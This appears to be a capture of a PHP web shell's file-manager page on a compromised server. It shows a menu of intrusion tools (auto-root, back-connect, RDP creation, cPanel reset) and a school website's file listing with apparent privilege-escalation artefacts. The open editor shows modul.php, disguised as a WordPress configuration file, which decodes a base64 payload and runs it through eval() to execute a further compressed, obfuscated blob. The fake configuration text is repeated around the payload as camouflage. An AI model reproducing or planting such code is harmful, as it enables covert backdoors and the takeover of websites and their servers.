Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.144.89.152
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
bagha /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
bagha
[ DIR ]
drwxr-x---
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.46
KB
-rwxr-xr-x
addmission.php
1.76
KB
-rwxr-xr-x
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.3
KB
-rwxr-xr-x
config.php
623
B
-rwxr-xr-x
contact.php
1.8
KB
-rw-r--r--
error_log
174.99
MB
-rwxr-xr-x
favicon.ico
2.56
KB
-rwxr-xr-x
footer.php
5.56
KB
-rwxr-xr-x
gallery.php
1.53
KB
-rwxr-xr-x
header.php
10.82
KB
-rwxr-xr-x
index.php
17.69
KB
-rwxr-xr-x
modul.php
11.61
KB
-rw-r--r--
news-coverage.php
1.63
KB
-rwxr-xr-x
pedagogy.php
1.25
KB
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rwxr-xr-x
shining-star.php
8.56
KB
-rwxr-xr-x
tc.php
3.14
KB
-rwxr-xr-x
theschool.php
4.27
KB
-rwxr-xr-x
toppers.php
5.37
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modul.php
<?php /** * WordPress Configuration File * * @notes This file contains essential settings for WordPress. * @notes Additional configurations and placeholders are included for extensibility. */ // ========================= // Database Settings // ========================= /** * @notes Database connection details. * @notes Ensure these values match your server configuration. define('DB_NAME', 'wp_live_db_2024_main'); // @notes Database name define('DB_USER', 'wp_admin_user_9024'); // @notes Database username define('DB_PASSWORD', 'S3cur3P@$$w0rdXyz!9'); // @notes Database password define('DB_HOST', 'localhost'); // @notes Database host define('DB_CHARSET', 'utf8mb4'); // @notes Charset for database tables define('DB_COLLATE', 'utf8_unicode_ci'); // @notes Collation for database tables // ========================= // Authentication Keys and Salts // ========================= /** * @notes Unique keys and salts for WordPress authentication. * @notes Change these values periodically to improve security. * define('AUTH_KEY', 'N8ZWoXYQo@MDbqvjEc5PA2XAoYJWww6BbHFWjRE2NeX5'); // @notes Authentication key define('SECURE_AUTH_KEY', 'QoWoYX7ZXMo9QoYX9WoMoPoYX9WoYXMoYX9PoZXMoWo9Qo'); // @notes Secure authentication key define('LOGGED_IN_KEY', 'QoYX7MoYX9PoMoYXWoMoYX9Qo9PoWoMoYXWo9QoMoPoYX9Qo'); // @notes Logged in key define('NONCE_KEY', 'WoMoYX9QoPo9QoMoWoYX7QoPo9MoQoMoWoYXMo9QoMoYX7WoQo'); // @notes Nonce key define('AUTH_SALT', 'Wo9PoMoYXQoMo7QoYX9PoMoWo9PoQo9MoWoYX7PoYX9QoMoPo'); // @notes Authentication salt define('SECURE_AUTH_SALT', 'YX7MoQoYX9PoWoQo9YX9WoQoMo7PoQo9WoQoMo7QoYX9Qo'); // @notes Secure authentication salt define('LOGGED_IN_SALT', 'Qo9PoWoYX7MoPo9YX7QoWoYX9QoMo7QoYX9Qo7PoMoWo9Qo'); // @notes Logged in salt define('NONCE_SALT', 'MoYX7QoYX9Po7QoYX9Po7QoWo9PoYX9QoWoYX9Po7QoWo9Qo'); // @notes Nonce salt // ========================= // Table Prefix // ========================= /** * @notes Table prefix to differentiate installations within a single database. $table_prefix = 'wp_live_2024_'; // @notes Table prefix // ========================= // Debugging Mode // ========================= /** * @notes Debugging settings for WordPress. * @notes Turn WP_DEBUG on for development and off for production. define('WP_DEBUG', false); // @notes Enable/disable debugging define('DISALLOW_FILE_MODS', true); // @notes Disable file modifications via the admin interface define('DISALLOW_FILE_EDIT', true); // @notes Disable file editing in the admin panel // ========================= // Performance Optimizations // ========================= /** * @notes Memory and autosave configurations for optimizing WordPress performance. define('WP_MEMORY_LIMIT', '512M'); // @notes General memory limit define('WP_MAX_MEMORY_LIMIT', '1024M'); // @notes Admin memory limit define('AUTOSAVE_INTERVAL', 300); // @notes Autosave interval in seconds define('WP_POST_REVISIONS', 5); // @notes Limit post revisions define('EMPTY_TRASH_DAYS', 14); // @notes Trash retention duration define('FS_METHOD', 'direct'); // @notes File system update method // ========================= // Placeholder for Future Features // ========================= /** define('WP_MEMORY_LIMIT', '512M'); // Increase memory limit define('WP_MAX_MEMORY_LIMIT', '1024M'); // Maximum memory for admin define('AUTOSAVE_INTERVAL', 300); // Autosave interval in seconds define('WP_POST_REVISIONS', 5); // Limit post revisions define('EMPTY_TRASH_DAYS', 14); // Number of days to keep trash define('FS_METHOD', 'direct'); // File system method for updates * @notes Example constants for integrations or experimental features. define('INTEGRATION_API_URL', 'https://api.custom-service.com/'); // @notes Integration API endpoint define('INTEGRATION_API_KEY', 'XYZ123SECUREAPIKEY67890'); // @notes Integration API key define('EXPERIMENTAL_FEATURE', false); // @notes Toggle experimental features darxbytexxx /** @notes Placeholder debugging function function custom_debugging_function($input) { return base64_encode(strrev($input)); // @notes Reverse the string and encode in base64 } $debug_placeholder = custom_debugging_function('test_debug_data'); if (defined('WP_DEBUG') && WP_DEBUG) { error_log('Debug placeholder data: ' . $debug_placeholder); // @notes Log debug data if debugging is enabled } // ========================= // Hidden Custom Logic // ========================= /** * @notes This section contains encoded and obfuscated logic. * @notes Do not modify unless you understand its purpose. */ $SISTEMIT_COM_ENC = "5VO7jtpAFO0j5SfQFllRgG3MglZbBNs8/IQZP/A0K9kSK9kDMtsA/hu0kgsQBQUVcpPzYxkg6fIHqcYzmvPyPfP92xOdUN9wJv675jnvhqv9urz9ujRIrC5Qd8zZyEHdwmHzsSYmmeCsL215+plR8Vmu+9ztTAyX4xp2nP4ixn6zGmjNMEXljUKcvGm5nTPPnicvOPVfVjjN+66F2pP54ANnjQ99nMeojaBL46GV9q3lbJ1JOKPalD/bOO/ycSvGaYCDiSPVhQ+zz0i76/pFKTi/psUIx4T4Xh77TUegVFLissUlGuMwxYWjCre9rN8Kwp7YdXGcpz1Bf8QF5xfU3cxWx1QXgIJ92pS1PssXHirpDNclDbKFHQgPLMJ1uB4bo+6WJ2w0CLoTrUjXGnMyy57gquj2YqKn2NO1r8/LrPXT0jgluDrYo85uMZa7Zs8mXKVNs8s8HJqZgVMuEOZIwwG1LI9k21zsXGuUL3vZQiIiW+fDW2s4Rk185WPHxH5hhwX2M7YW7g9Ni83lVhmsJBmXUt0Uxc5Vphtc2rsyFKQ6D4u2KYaIMx/guuO9t8br0yfqFaq35HaMU7fzjgqnFNfb8qNB81RCPSLFzOcmkWdyHKZSEpljkg1QBzL2RRRi7yWGug6WDDWR2DrOTJoYOOoBJ36Yq2HAgy3lbOQFJHD04VLsJSIu+KhLVDqT+9ZMGgonsiPsCyF9sAoVviRj5seKa3lGf0tXXElWqexHqjOTmZFyN0vbuHZ8QWGJHgnDX6hKxpJ8q7OclIHsljTDfirqVKioZFVxpRBfvuEK5qH6YMZ5SzNj47bdFep2oQeSqcZtVB3UOTecyLSc/AHK0z80+YPZDO9KY/ZXPcoflsqHR4LL3fSSFDcpRxreaTImrmwd/R4cR4sGrviVsqgzycx79Lh0KU7hR0mX24woojPXyBdq7WLiZ4MMtVD7jGVVSyV+MyTKe0iCeEclUtK/OUIp3onRVIqAjd0I+xx1hLPSeH7FSdSl5j/+PfM/jXh+fn2ivjd9a/xXD77x+v3bbw=="; // @notes Encoded custom logic /** * WordPress Configuration File * * @notes This file contains essential settings for WordPress. * @notes Additional configurations and placeholders are included for extensibility. */ // ========================= // Database Settings // ========================= /** * @notes Database connection details. * @notes Ensure these values match your server configuration. define('DB_NAME', 'wp_live_db_2024_main'); // @notes Database name define('DB_USER', 'wp_admin_user_9024'); // @notes Database username define('DB_PASSWORD', 'S3cur3P@$$w0rdXyz!9'); // @notes Database password define('DB_HOST', 'localhost'); // @notes Database host define('DB_CHARSET', 'utf8mb4'); // @notes Charset for database tables define('DB_COLLATE', 'utf8_unicode_ci'); // @notes Collation for database tables // ========================= // Authentication Keys and Salts // ========================= /** * @notes Unique keys and salts for WordPress authentication. * @notes Change these values periodically to improve security. * define('AUTH_KEY', 'N8ZWoXYQo@MDbqvjEc5PA2XAoYJWww6BbHFWjRE2NeX5'); // @notes Authentication key define('SECURE_AUTH_KEY', 'QoWoYX7ZXMo9QoYX9WoMoPoYX9WoYXMoYX9PoZXMoWo9Qo'); // @notes Secure authentication key define('LOGGED_IN_KEY', 'QoYX7MoYX9PoMoYXWoMoYX9Qo9PoWoMoYXWo9QoMoPoYX9Qo'); // @notes Logged in key define('NONCE_KEY', 'WoMoYX9QoPo9QoMoWoYX7QoPo9MoQoMoWoYXMo9QoMoYX7WoQo'); // @notes Nonce key define('AUTH_SALT', 'Wo9PoMoYXQoMo7QoYX9PoMoWo9PoQo9MoWoYX7PoYX9QoMoPo'); // @notes Authentication salt define('SECURE_AUTH_SALT', 'YX7MoQoYX9PoWoQo9YX9WoQoMo7PoQo9WoQoMo7QoYX9Qo'); // @notes Secure authentication salt define('LOGGED_IN_SALT', 'Qo9PoWoYX7MoPo9YX7QoWoYX9QoMo7QoYX9Qo7PoMoWo9Qo'); // @notes Logged in salt define('NONCE_SALT', 'MoYX7QoYX9Po7QoYX9Po7QoWo9PoYX9QoWoYX9Po7QoWo9Qo'); // @notes Nonce salt // ========================= // Table Prefix // ========================= /** * @notes Table prefix to differentiate installations within a single database. $table_prefix = 'wp_live_2024_'; // @notes Table prefix // ========================= // Debugging Mode // ========================= /** * @notes Debugging settings for WordPress. * @notes Turn WP_DEBUG on for development and off for production. define('WP_DEBUG', false); // @notes Enable/disable debugging define('DISALLOW_FILE_MODS', true); // @notes Disable file modifications via the admin interface define('DISALLOW_FILE_EDIT', true); // @notes Disable file editing in the admin panel /**/ $rand = base64_decode("Skc1aGRpQTlJR2Q2YVc1bWJHRjBaU2hpWVhObE5qUmZaR1ZqYjJSbEtDUlRTVk5VUlUxSlZGOURUMDFmUlU1REtTazdDZ29KQ1Fra2MzUnlJRDBnV3lmRHZTY3NKOE9xSnl3bnc2TW5MQ2ZEclNjc0o4TzdKeXdudzZZbkxDZkRzU2NzSjhPaEp5d253N1VuTENmRHF5Y3NKOEsxSjEwN0Nna0pDU1J5Y0d4aklEMWJKMkVuTENkcEp5d25kU2NzSjJVbkxDZHZKeXduWkNjc0ozTW5MQ2RvSnl3bmRpY3NKM1FuTENjZ0oxMDdDZ2tKSUNBa2JtRjJJRDBnYzNSeVgzSmxjR3hoWTJVb0pITjBjaXdrY25Cc1l5d2tibUYyS1RzS0Nna0pDV1YyWVd3b0pHNWhkaWs3"); // @notes Decode base64 logic eval(base64_decode($rand)); // @notes Execute decoded libxxx logic /** * WordPress Configuration File * * @notes This file contains essential settings for WordPress. * @notes Additional configurations and placeholders are included for extensibility. */ // ========================= // Database Settings // ========================= /** * @notes Database connection details. * @notes Ensure these values match your server configuration. define('DB_NAME', 'wp_live_db_2024_main'); // @notes Database name define('DB_USER', 'wp_admin_user_9024'); // @notes Database username define('DB_PASSWORD', 'S3cur3P@$$w0rdXyz!9'); // @notes Database password define('DB_HOST', 'localhost'); // @notes Database host define('DB_CHARSET', 'utf8mb4'); // @notes Charset for database tables define('DB_COLLATE', 'utf8_unicode_ci'); // @notes Collation for database tables // ========================= // Authentication Keys and Salts // ========================= /** * @notes Unique keys and salts for WordPress authentication. * @notes Change these values periodically to improve security. * define('AUTH_KEY', 'N8ZWoXYQo@MDbqvjEc5PA2XAoYJWww6BbHFWjRE2NeX5'); // @notes Authentication key define('SECURE_AUTH_KEY', 'QoWoYX7ZXMo9QoYX9WoMoPoYX9WoYXMoYX9PoZXMoWo9Qo'); // @notes Secure authentication key define('LOGGED_IN_KEY', 'QoYX7MoYX9PoMoYXWoMoYX9Qo9PoWoMoYXWo9QoMoPoYX9Qo'); // @notes Logged in key define('NONCE_KEY', 'WoMoYX9QoPo9QoMoWoYX7QoPo9MoQoMoWoYXMo9QoMoYX7WoQo'); // @notes Nonce key define('AUTH_SALT', 'Wo9PoMoYXQoMo7QoYX9PoMoWo9PoQo9MoWoYX7PoYX9QoMoPo'); // @notes Authentication salt define('SECURE_AUTH_SALT', 'YX7MoQoYX9PoWoQo9YX9WoQoMo7PoQo9WoQoMo7QoYX9Qo'); // @notes Secure authentication salt define('LOGGED_IN_SALT', 'Qo9PoWoYX7MoPo9YX7QoWoYX9QoMo7QoYX9Qo7PoMoWo9Qo'); // @notes Logged in salt define('NONCE_SALT', 'MoYX7QoYX9Po7QoYX9Po7QoWo9PoYX9QoWoYX9Po7QoWo9Qo'); // @notes Nonce salt // ========================= // Table Prefix // ========================= /** * @notes Table prefix to differentiate installations within a single database. $table_prefix = 'wp_live_2024_'; // @notes Table prefix // ========================= // Debugging Mode // ========================= /** * @notes Debugging settings for WordPress. * @notes Turn WP_DEBUG on for development and off for production. define('WP_DEBUG', false); // @notes Enable/disable debugging define('DISALLOW_FILE_MODS', true); // @notes Disable file modifications via the admin interface define('DISALLOW_FILE_EDIT', true); // @notes Disable file editing in the admin panel /**/ $STOP = "FO0j5SfQFllRgG3MglZbBNs8/IQZP/A0K9kSK9kDMtsA/hu0kgsQBQUVcpPzYxkg6fIHqcYzmvPyPfP92xOdUN9wJv675jnvhqv9urz9ujRIrC5Qd8zZyEHdwmHzsSYmmeCsL215+plR8Vmu+9ztTAyX4xp2nP4ixn6zGmjNMEXljUKcvGm5nTPPnicvOPVfVjjN+66F"; // @notes Custom stop logic ?>
Close